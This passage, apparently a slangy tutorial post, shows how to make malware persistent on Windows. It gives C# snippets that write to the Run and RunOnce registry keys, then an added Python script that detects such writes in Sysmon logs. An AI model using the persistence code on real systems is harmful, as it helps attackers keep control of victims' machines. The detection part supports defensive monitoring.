Common keys:
- Loggin' In and Runnin': This key is the one you want to look at. It lets programs run every time a user logs in, which is perfect for keepin' your nasty little bugger alive and kicking:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- One-Time Wonders: It's similar to the previous one, but the programs only run once when the user logs in. Might come in handy for certain types of attacks:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
Puttin' It into Practice:
Let's have a look at some C# console program examples to show you how to mess with these keys and keep your malware persistent.
- Example 1: Runnin' "mrMalw" on login:
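using Microsoft.Win32;
// Open the per-user Run key for writing (second argument) and add a value naming the executable.
RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
key.SetValue("MalwareApp", @"C:\path\to\file\mrMalw.exe");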
- Example 2: Runnin' "evilCode" once on login:
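using Microsoft.Win32;
// Same call against RunOnce: Windows removes the value after it has been run once.
RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", true);
key.SetValue("EvilApp", @"C:\path\to\file\evilCode.exe");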
So, there ya have it, mate. Givin' your malware a fair go at stayin' on those Windows systems.
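Seen from the defender's side, writes like the two above land in registry-set telemetry. The following is an added example, not part of the original post: it triages Sysmon-style Event ID 13 records for values written under the per-user Run and RunOnce keys. The field names (EventType, TargetObject, Details, Image) follow Sysmon's registry event; the sample events, SID, allowlist and the "user-writable" path heuristic are constructed assumptions.

```python
import re

# Sysmon reports HKEY_CURRENT_USER as HKU\<user SID>\..., so match the SID form.
RUN_KEY = re.compile(
    r"^HKU\\S-1-5-21-[\d-]+\\Software\\Microsoft\\Windows\\CurrentVersion\\"
    r"(?P<key>Run|RunOnce)\\(?P<value>[^\\]+)$", re.IGNORECASE)
# Locations a standard user can write to; an autostart target there rates higher.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Users\\Public)\\", re.IGNORECASE)
# Constructed allowlist of (value name, target path) pairs approved in this environment.
ALLOWLIST = {("OneDrive", r"C:\Program Files\Microsoft OneDrive\OneDrive.exe")}

def extract_path(details):
    """Return the executable path from registry data (quoted or bare, with arguments)."""
    details = details.strip()
    if details.startswith('"'):
        return details[1:].split('"', 1)[0]
    m = re.match(r"(.+?\.(?:exe|dll|bat|cmd|ps1|vbs|js))\b", details, re.IGNORECASE)
    return m.group(1) if m else details

def triage(events):
    # Keep only Event ID 13 (registry value set) records that write a Run/RunOnce value.
    findings = []
    for ev in events:
        if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
            continue
        m = RUN_KEY.match(ev.get("TargetObject", ""))
        if not m:
            continue
        path = extract_path(ev.get("Details", ""))
        if (m["value"], path) in ALLOWLIST:
            continue
        findings.append({"key": m["key"], "value": m["value"], "path": path,
                         "writer": ev.get("Image", ""),
                         "severity": "high" if USER_WRITABLE.search(path) else "review"})
    return findings

# Constructed sample events; the SID, user name and paths are placeholders.
HIVE = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion"
SAMPLE_EVENTS = [
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Users\alice\Downloads\setup.exe",
     "TargetObject": HIVE + r"\Run\MalwareApp", "Details": r"C:\path\to\file\mrMalw.exe"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": HIVE + r"\RunOnce\EvilApp",
     "Details": r'"C:\Users\alice\AppData\Roaming\upd\evilCode.exe" /silent'},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\explorer.exe",
     "TargetObject": HIVE + r"\Run\OneDrive", "Details": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'},
    {"EventID": 13, "EventType": "SetValue", "TargetObject": HIVE + r"\Explorer\Advanced\Hidden", "Details": "DWORD (0x00000001)"},
]
if __name__ == "__main__":
    print(*triage(SAMPLE_EVENTS), sep="\n")
```

RunOnce values are deleted after they execute, so a point-in-time listing of the key can miss them; the write event is the durable record.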